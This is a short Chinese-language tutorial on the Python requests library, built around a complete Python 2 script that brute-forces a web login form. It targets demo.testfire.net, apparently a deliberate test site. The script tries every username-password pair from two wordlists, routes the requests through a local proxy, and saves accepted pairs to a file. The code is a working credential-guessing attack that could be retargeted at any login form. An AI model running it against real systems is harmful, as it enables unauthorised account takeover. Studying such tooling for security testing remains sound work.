Python 的 HTTP 库 requests 模块在 Web 表单爆破中的使用方法
requests 模块中代理的使用方式
requests 模块是 Python 的 HTTP 库中功能比较全的模块，简单易用，比之前文章中使用的 httplib、urllib、urllib2 都要好用。脚本中的请求方式也可以替换为 requests 的 Session 方法。
# -*- coding: utf-8 -*-
import requests
# Results file, opened for writing as soon as the module is loaded (mode 'w'
# truncates any previous run's output). brute_force() appends every accepted
# "name:password" pair to it and the __main__ block closes it.
# NOTE(review): the pairs are written in cleartext -- treat this file as
# sensitive data and restrict who can read it.
outFile = open('accounts-cracked.txt', 'w')
def brute_force(user, password):
    """Submit one username/password pair to the demo login form and log the result.

    Both arguments are stripped of surrounding whitespace (the caller passes
    raw wordlist lines, trailing newline included). The pair is sent as a
    form-encoded POST with redirect following disabled. A 301 or 302 reply is
    treated as an accepted login: it is printed and appended to the
    module-level ``outFile`` as ``name:password``. Any other status code is
    printed as a failed attempt. Returns None.

    NOTE(review): success is inferred from the redirect status alone. A site
    that also answers a failed login with a redirect would be recorded as a
    hit, so results need to be confirmed before they are relied on.

    Seen from the server, this is a run of login POSTs from one client with
    an unchanging User-Agent and Referer -- the pattern that per-account
    lockout and per-source throttling on a login endpoint are meant to stop.
    """
    # Target login form; the original author describes it as an IBM test site.
    login_url = "http://demo.testfire.net/bank/login.aspx"

    # Route plain-HTTP traffic through a local intercepting proxy on port 8080
    # (Burp in the author's setup) so each request/response can be inspected
    # while troubleshooting. For an https site the author uses
    # {"https": "127.0.0.1:8080"} instead.
    local_proxy = {"http":"127.0.0.1:8080"}

    browser_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
    request_headers = {
        "User-Agent": browser_ua,
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://demo.testfire.net/bank/login.aspx",
    }

    # strip() removes leading/trailing whitespace, including the newline that
    # readlines() leaves on every wordlist entry.
    name = user.strip()
    passwd = password.strip()
    form_fields = {'uid': name, 'passw': passwd, 'btnSubmit': 'Login'}

    # allow_redirects=False keeps the first response visible, so the raw
    # status code of the login reply itself can be examined.
    reply = requests.post(
        login_url,
        headers=request_headers,
        proxies=local_proxy,
        data=form_fields,
        allow_redirects=False,
    )

    if reply.status_code not in (301, 302):
        print '----- error user:', name, ' with password:', passwd, '-----'
        return

    print '+++++ find user:', name, ' with password:', passwd, '+++++'
    outFile.write(name + ':' + passwd + '\n')
if __name__ == '__main__':
    # Load both wordlists fully into memory; entries keep their trailing
    # newline here and are stripped inside brute_force().
    with open('user.dic', 'r') as user_file:
        usernames = user_file.readlines()
    with open('pass.dic', 'r') as pass_file:
        passwords = pass_file.readlines()

    # Every username is paired with every password, one request per pair,
    # sequentially.
    for candidate_user in usernames:
        for candidate_pass in passwords:
            brute_force(user=candidate_user, password=candidate_pass)

    # Close the results file so its contents are flushed before it is
    # re-opened for counting.
    outFile.close()

    # One line per recorded pair, so the line count is the number of hits.
    with open('accounts-cracked.txt', 'r') as results:
        hit_count = len(results.readlines())

    if hit_count > 0:
        # Message reads: "found <n> account/password pairs".
        print "找到", hit_count, "个账号密码"
    else:
        print "All thread OK,maybe not "